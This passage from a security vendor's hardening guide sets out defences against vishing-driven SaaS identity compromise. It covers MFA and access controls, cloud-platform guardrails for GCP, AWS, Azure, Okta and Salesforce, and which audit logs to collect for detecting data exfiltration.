inbound call without providing any access or information</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Independently contact the company's designated account manager for that vendor using trusted, on-file contact information</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require explicit verification from the account manager before proceeding with any request</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">End User Education</span></h5> <p><span style="vertical-align: baseline;">Organizations should educate end users on best practices especially when being reached out directly without prior notice.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Conduct internal Vishing and Phishing exercises to validate end user adoption of security best practices</span><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Educate that passwords should not be shared, regardless of who is asking for it.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Encourage users to exercise extreme caution when being requested to reset their own passwords and MFA; especially during off-business hours.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If they are unsure of the person or number they are being contacted by, have them cease all communications and contact a known support channel for guidance.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Identity &amp; Access Management</span></h4> <p><span style="vertical-align: baseline;">Organizations should implement a layered series of controls to protect all types of identities. Access to cloud identity providers (IdPs), cloud consoles, SaaS applications, document and code repositories should be restricted since these platforms often become the control plane for privilege escalation, data access, and long-term persistence.</span></p> <p><span style="vertical-align: baseline;">This can be achieved by:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Limiting access to trusted egress points and physical locations</span></li> <li role="presentation"><span style="vertical-align: baseline;">Review and understand what “local accounts” exist within SaaS platforms:</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Ensure any default username/passwords have been updated according to the organization’s password policy.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Limit the use of ‘local accounts’ that are not managed as part of the organization’s primary centralized IdP.</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Reducing the scope of non-human accounts (access keys, tokens, and non-human accounts)</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Where applicable, organizations should implement network restrictions across non-human accounts. </span></li> <li role="presentation"><span style="vertical-align: baseline;">Activity correlating to long-lived tokens (OAuth / API) associated with authorized / trusted applications should be monitored to detect abnormal activity.</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Limit access to organization resources from managed and compliant devices only. Across managed devices:</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Implement device posture checks via the Identity Provider.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Block access from devices with prolonged inactivity.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Block end users ability to enroll personal devices. </span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Where access from unmanaged devices is required, organizations should: </span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Limit non-managed devices to web only views.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Disable ability to download/store corporate/business data locally on unmanaged personal devices.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Limit session durations and prompt for re-authentication with MFA.</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Rapid enhancement to MFA methods, such as:</span> <ul> <li role="presentation">Removal of SMS, phone call, push notification, and/or email as authentication controls.</li> <li role="presentation">Requiring strong, phishing resistant MFA methods such as: <ul> <li role="presentation">Authenticator apps that require phishing resistant MFA (FIDO2 Passkey Support may be added to existing methods such as Microsoft Authenticator.)</li> <li role="presentation">FIDO2 security keys for authenticating identities that are assigned privileged roles.</li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Enforce multi-context criteria to enrich the authentication transaction.</span> <ul> <li role="presentation"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Examples include not only validating the identity, but also specific device and location attributes as part of the authentication transaction.</span></span> <ul> <li role="presentation"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">For organizations that leverage Google Workspace, these concepts can be enforced by using context-aware access policies. </span></span></li> <li role="presentation"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">For organizations that leverage Microsoft Entra ID, these concepts can be enforced by using a Conditional Access Policy. </span></span></li> <li role="presentation"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">For organizations that leverage Okta, these concepts can be enforced by using Okta policies and rules.</span></span></li> </ul> </li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">Attackers are consistently targeting non-human identities due to the limited number of detections around them, lack of baseline of normal vs abnormal activity, and common assignment of privileged roles attached to these identities. Organizations should: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Identify and track all programmatic identities and their usage across the environment, including where they are created, which systems they access, and who owns them.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Centralize storage in a secrets manager (cloud-native or third-party) and prevent credentials from being embedded in source code, config files, or CI/CD pipelines.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restrict authentication IPs for programmatic credentials so they can only be used from trusted third-party or internal IP ranges wherever technically feasible.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Transition to workload identity federation: Where feasible, replace long-lived static credentials (such as AWS access keys or service account keys) with workload identity federation mechanisms (often based on OIDC). This allows applications to authenticate using short-lived, ephemeral tokens issued by the cloud provider, dramatically reducing the risk of credential theft from code repositories and file systems.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce strict scoping and resource binding by tying credentials to specific API endpoints, services, or resources. For example, an API key should not simply have “read” access to storage, but be limited to a particular bucket or even a specific prefix, minimizing blast radius if it is compromised.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Baseline expected behavior for each credential type (typical access paths, destinations, frequency, and volume) and integrate this into monitoring and alerting so anomalies can be quickly detected and investigated.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional platform-specific hardening measures include: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Okta</strong></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable Okta </span><a href="https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ThreatInsight</span></a><span style="vertical-align: baseline;"> to automatically block IP addresses identified as malicious.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restrict Super Admin access to specific network zones (corporate VPN).</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Microsoft Entra ID</strong></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Implement common </span><a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-conditional-access-policy-common?tabs=secure-foundation" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Conditional Access Policies</span></a><span style="vertical-align: baseline;"> to block unauthorized authentication attempts and restrict high-risk sign-ins.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Configure </span><a href="https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-risk-policies" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">risk-based policies</span></a><span style="vertical-align: baseline;"> to trigger password changes or MFA when risk is detected.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restrict who is allowed to register applications in Entra ID and require administrator approval for all application registrations.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Google Workspace</strong></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Use </span><a href="https://support.google.com/a/answer/12645308?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Context-Aware Access</span></a><span style="vertical-align: baseline;"> levels to restrict Google Drive and Admin Console access based on device attributes and IP address.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce 2-Step Verification (2SV) for all Google Workspace users.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Use </span><a href="https://landing.google.com/intl/en_in/advancedprotection/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Advanced Protection</span></a><span style="vertical-align: baseline;"> to protect high-risk users from targeted phishing, malware, and account hijacking.</span></p> </li> </ul> </ul> <h4><span style="vertical-align: baseline;">Infrastructure and Application Platforms </span></h4> <p><span style="vertical-align: baseline;">Infrastructure and application platforms such as Cloud consoles and SaaS applications are frequent targets for credential harvesting and data exfiltration. Protecting these systems typically requires implementing the previously outlined identity controls, along with platform-specific security guardrails, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restrict management-plane access so it’s only reachable from the organization’s network and approved VPN ranges.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Scan for and remediate exposed secrets, including sensitive credentials stored across these platforms.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce device access controls so access is limited to managed, compliant devices.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor configuration changes to identify and investigate newly created resources, exposed services, or other unauthorized modifications.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Implement logging and detections to identify:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Newly created or modified network security group (NSG) rules, firewall rules, or publicly exposed resources that enable remote access.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Creation of programmatic keys and credentials (e.g., access keys).</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Disable API/CLI access for non-essential users by restricting programmatic access to those who explicitly require it for management-plane operations.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Platform Specifics</span></h4> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">GCP</strong></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Configure security perimeters with </span><a href="https://docs.cloud.google.com/vpc-service-controls/docs/overview"><span style="text-decoration: underline; vertical-align: baseline;">VPC Service Controls (VPC-SC)</span></a><span style="vertical-align: baseline;"> to prevent data from being copied to unauthorized Google Cloud resources even if they have valid credentials.<br/></span><span style="vertical-align: baseline;"><br/></span><span style="vertical-align: baseline;">Set additional guardrails with </span><a href="https://cloud.google.com/blog/products/identity-security/just-say-no-build-defense-in-depth-with-iam-deny-and-org-policies"><span style="text-decoration: underline; vertical-align: baseline;">organizational policies and deny policies</span></a><span style="vertical-align: baseline;"> applied at the organization level. This stops developers from introducing misconfigurations that could be exploited by attackers. For example, enforcing organizational policies like “iam.disableServiceAccountKeyCreation” will prevent generating new unmanaged service account keys that can be easily exfiltrated.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Apply </span><a href="https://docs.cloud.google.com/iam/docs/conditions-overview"><span style="text-decoration: underline; vertical-align: baseline;">IAM Conditions</span></a><span style="vertical-align: baseline;"> to sensitive role bindings. Restrict roles so they only activate if the resource name starts with a specific prefix or if the request comes during specific working hours. This limits the blast radius of a compromised credential.</span></p> </li> </ul> </ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">AWS</strong></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Apply </span><a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Service Control Policies (SCPs)</span></a><span style="vertical-align: baseline;"> at the root level of the AWS Organization that limit the attack surface of AWS services. For example, deny access in unused regions, block creation of IAM access keys, and prevent deletion of backups, snapshots, and critical resources.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Define data perimeters through </span><a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Resource Control Policies (RCPs)</span></a><span style="vertical-align: baseline;"> that restrict access to sensitive resources (like S3 buckets) to only trusted principals within your organization, preventing external entities from accessing data even with valid keys.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Implement alerts on common reconnaissance commands such as GetCallerIdentity API calls originating from non-corporate IP addresses. This is often the first reconnaissance command an attacker runs to verify their stolen keys.</span></p> </li> </ul> </li> <li><strong><span style="vertical-align: baseline;">Azure</span></strong> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;">Enforce <a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-all-users-device-compliance" rel="noopener" target="_blank">Conditional Access Policies (CAPs)</a> that block access to administrative applications unless the device is "Microsoft Entra hybrid joined" and "Compliant." This prevents attackers from accessing resources using their own tools or devices.</li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;">Eliminate standing admin access and require Just-In-Time (JIT) through <a href="https://docs.azure.cn/en-us/entra/id-governance/privileged-identity-management/pim-configure" rel="noopener" target="_blank">Privileged Identity Management (PIM)</a> for elevation for roles such as Global Administrator, mandating an approval workflow and justification for each activation.</li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;">Enforce the use of <a href="https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/overview" rel="noopener" target="_blank">Managed Identities for Azure resources</a> accessing other services. This removes the need for developers to handle or rotate credentials for service principals, eliminating the static key attack vector.</li> </ul> </li> <li><strong style="vertical-align: baseline;">Source Code Management</strong> <ul> <li>Enforce Single Sign-On (SSO) with SCIM for automated lifecycle management and mandate FIDO2/WebAuthn to neutralize phishing. Additionally, replace broad access tokens with short-lived, Fine-Grained Personal Access Tokens (PATs) to enforce least privilege.</li> <li>Prevent credential leakage by enabling native "Push Protection" features or implementing blocking CI/CD workflows (such as TruffleHog) that automatically reject commits containing high-entropy strings before they are merged.</li> <li>Mitigate the risk of malicious code injection by requiring cryptographic commit signing (GPG/S/MIME) and mandating a minimum of two approvals for all Pull Requests targeting protected branches.</li> <li>Conduct scheduled historical scans to identify and purge latent secrets that evaded preventative controls, ensuring any compromised credentials are immediately rotated and forensically investigated.</li> </ul> </li> <li><strong>Salesforce</strong> <ul> <li>Reference <a href="https://cloud.google.com/blog/topics/threat-intelligence/unc6040-proactive-hardening-recommendations#:~:text=programmatic%20credentials%20protections"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant’s Salesforce Hardening blog post</span></a></li> <li>Reference Salesforce “<a href="https://www.salesforce.com/blog/protecting-salesforce-data-after-an-identity-compromise/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Protecting Salesforce Data After an Identity Compromise</span></a><span style="vertical-align: baseline;">” blog post</span></li> </ul> </li> </ul></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">2. Logging</span></h3> <p><span style="vertical-align: baseline;">Modern SaaS intrusions rarely rely on payloads or technical exploits. Instead, Mandiant consistently observes attackers leveraging valid access (frequently gained via vishing or MFA bypass) to abuse native SaaS capabilities such as bulk exports, connected apps, and administrative configuration changes.</span></p> <p><span style="vertical-align: baseline;">Without clear visibility into these environments, detection becomes nearly impossible. If an organization cannot track which identity authenticated, what permissions were authorized, and what data was exported, they often remain unaware of a campaign until an extortion note appears.</span></p> <p><span style="vertical-align: baseline;">This section focuses on ensuring your organization has the necessary visibility into identity actions, authorizations, and SaaS export behaviors required to detect and disrupt these incidents before they escalate.</span></p> <h4><span style="vertical-align: baseline;">Identity Provider</span><strong style="vertical-align: baseline;"> </strong></h4> <p><span style="vertical-align: baseline;">If an adversary gains access through vishing and MFA manipulation, the first reliable signals will appear in the SSO control plane, not inside a workstation. In this example, the goal is to ensure Okta and Entra ID ogs identify who authenticated, what MFA changes occurred, and where access originated from.</span></p> <h4><span style="vertical-align: baseline;">What to Enable and Ingest into the SIEM</span></h4> <h5><span style="vertical-align: baseline;">Okta</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://developer.okta.com/docs/reference/api/event-types/?_gl=1%2a1he4agd%2a_gcl_au%2aMTI5ODE1Mjc3Ny4xNzY5NzkwMjMz%2a_ga%2aMTk4MDY0NzkxMi4xNzY5NzkwMjMz%2a_ga_QKMSDV5369%2aczE3Njk3OTAyMzIkbzEkZzEkdDE3Njk3OTA3ODQkajE4JGwwJGgw" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Authentication events</span></a><span style="vertical-align: baseline;"> (successful and failed sign-ins)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">MFA lifecycle events (enrollment/activation and changes to authentication factors or devices)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Administrative identity events that capture security-relevant actions (e.g., changes that affect authentication posture)</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Entra ID</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Authentication events</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Audit logs </span></a><span style="vertical-align: baseline;">for MFA changes / authentication method</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Audit logs for security posture changes that affect authentication</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Conditional Access policy changes</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Changes to Named Locations / trusted locations</span></p> </li> </ul> </ul> <h5><span style="vertical-align: baseline;">What “Good” Looks Like Operationally</span></h5> <p><span style="vertical-align: baseline;">You should be able to quickly identify:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Authentication factor, device enrollment activity, and the user responsible</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Source IP, geolocation, (and ASN if available) associated with that enrollment</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Whether access originated from the organization’s expected egress and identify access paths</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Platform</span></h4> <h5><span style="vertical-align: baseline;">Google Workspace Logging </span></h5> <p><span style="vertical-align: baseline;">Defenders should ensure they have visibility into OAuth authorizations, mailbox deletion activity (including deletion of security notification emails), and Google Takeout exports</span><strong style="vertical-align: baseline;">. </strong></p> <h5><span style="vertical-align: baseline;">What You Need in Place Before Logging</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Correct edition + investigation surfaces available: Confirm your Workspace edition supports the Audit and investigation tool and the Security Investigation tool (if you plan to use it).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Correct admin privileges: Ensure the account has Audit &amp; Investigation privilege (to access OAuth/Gmail/Takeout log events) and Security Center privilege.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If you need Gmail message content: Validate edition + privileges allow viewing message content during investigations. </span></p> </li> </ul> <h5><span style="vertical-align: baseline;">What to Enable and Ingest into the SIEM</span></h5> <p><strong><span style="vertical-align: baseline;">OAuth / App authorization logs</span></strong></p> <p><span style="vertical-align: baseline;">Enable and ingest </span><a href="https://support.google.com/a/answer/6124308?hl=en#zippy=%2Caudit-and-investigation-tool" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">token/app authorization logs</span></a><span style="vertical-align: baseline;"> to observe:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Which application was authorized (app name + identifier)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Which user granted access</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">What scopes were granted</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Source IP and geolocation for the authorization</span></p> </li> </ul> <p><span style="vertical-align: baseline;">This is the telemetry required to detect suspicious app authorizations and add-on enablement that can support mailbox manipulation.</span></p> <p><strong><span style="vertical-align: baseline;">Gmail audit logs</span></strong></p> <p><span style="vertical-align: baseline;">Enable and ingest </span><a href="https://support.google.com/a/answer/11479100?hl=en#zippy=%2Caudit-and-investigation-tool" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Gmail audit events</span></a><span style="vertical-align: baseline;"> that capture:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Message deletion actions (including permanent delete where available)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Message direction indicators (especially useful for outbound cleanup behavior)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Message metadata (e.g., subject) to support detection of targeted deletions of security notification emails</span></p> </li> </ul> <p><strong><span style="vertical-align: baseline;">Google Takeout audit logs</span></strong></p> <p><span style="vertical-align: baseline;">Enable and ingest </span><a href="https://support.google.com/a/answer/10276199?hl=en#zippy=%2Caudit-and-investigation-tool" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Takeout logs</span></a><span style="vertical-align: baseline;"> to capture:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Export initiation and completion events</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User and source IP/geo for the export activity</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Salesforce Logging </span></h4> <p><span style="vertical-align: baseline;">Activity observed by Mandiant includes the use of Salesforce Data Loader and large-scale access patterns that won’t be visible if only basic login history logs are collected. </span><a href="http://salesforce.com/blog/protecting-salesforce-data-after-an-identity-compromise/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Additional Salesforce telemetry</span></a><span style="vertical-align: baseline;"> that captures logins, configuration changes, connected app/API activity, and export behavior is needed to investigate SaaS-native exfiltration. Detailed implementation guidance for these visibility gaps can be found in Mandiant’s </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc6040-proactive-hardening-recommendations?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">Targeted Logging and Detection Controls for Salesforce</span></a><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">What You Need in Place Before Logging</span></h5> <ul> <li role="presentation"><span style="vertical-align: baseline;">Entitlement check (must-have)</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Most security-relevant </span><a href="https://resources.docs.salesforce.com/260/latest/en-us/sfdc/pdf/salesforce_security_impl_guide.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Salesforce logs</span></a><span style="vertical-align: baseline;"> are gated behind </span><a href="https://help.salesforce.com/s/articleView?id=xcloud.real_time_event_monitoring_overview.htm&amp;type=5" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Event Monitoring</span></a><span style="vertical-align: baseline;">, delivered through Salesforce Shield or the Event Monitoring add-on. Confirm you are licensed for the event types you plan to use for detection.</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Choose the collection method that matches your operations</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Use real-time event monitoring (RTEM) if you need near real-time detection.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Use event log files (ELF) if you need predictable batch exports for long-term storage and retrospective investigations.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Use event log objects (ELO) if you require queryable history via Salesforce Object Query Language (often requires Shield/add-on).</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Enable the events you intend to detect on</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">Use </span><a href="https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/event_monitoring_monitor_events_with_event_manager.htm" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Event Manager</span></a><span style="vertical-align: baseline;"> to explicitly turn on the event categories you plan to ingest, and ensure the right teams have access to view and operationalize the data (profiles/permission sets).</span></li> </ul> </li> <li role="presentation"><span style="vertical-align: baseline;">Threat Detection and Enhanced Transaction Security</span> <ul> <li role="presentation"><span style="vertical-align: baseline;">If your environment uses </span><a href="https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/real_time_em_threat_detection.htm" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Threat Detection</span></a><span style="vertical-align: baseline;"> or </span><a href="https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/enhanced_transaction_security_policy_types.htm" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ETS</span></a><span style="vertical-align: baseline;">, verify the event types that feed those controls and ensure your log ingestion platform doesn’t omit the events you expect to alert on.</span></li> </ul> </li> </ul> <h5><span style="vertical-align: baseline;">What to Enable and Ingest into the SIEM</span></h5> <p><strong><span style="vertical-align: baseline;">Authentication and access</span></strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">LoginHistory (who logged in, when, from where, success/failure, client type)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">LoginEventStream (richer login telemetry where available)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Administrative/configuration visibility</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SetupAuditTrail (changes to admin and security configurations)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">API and export visibility</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">ApiEventStream (API usage by users and connected apps)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">ReportEventStream (report export/download activity)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BulkApiResultEvent (bulk job result downloads—critical for bulk extraction visibility)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Additional high-value sources (if available in your tenant)</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">LoginAsEventStream (impersonation / “login as” activity)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">PermissionSetEvent (permission grants/changes)</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">SaaS Pivot Logging </span></h4> <p><span style="vertical-align: baseline;">Threat actors often pivot from compromised SSO providers into additional SaaS platforms, including DocuSign and Atlassian. Ingesting audit logs from these platforms into a SIEM environment enables the detection of suspicious access and large-scale data exfiltration following an identity compromise.</span></p> <h5><span style="vertical-align: baseline;">What You Need in Place Before Logging</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> 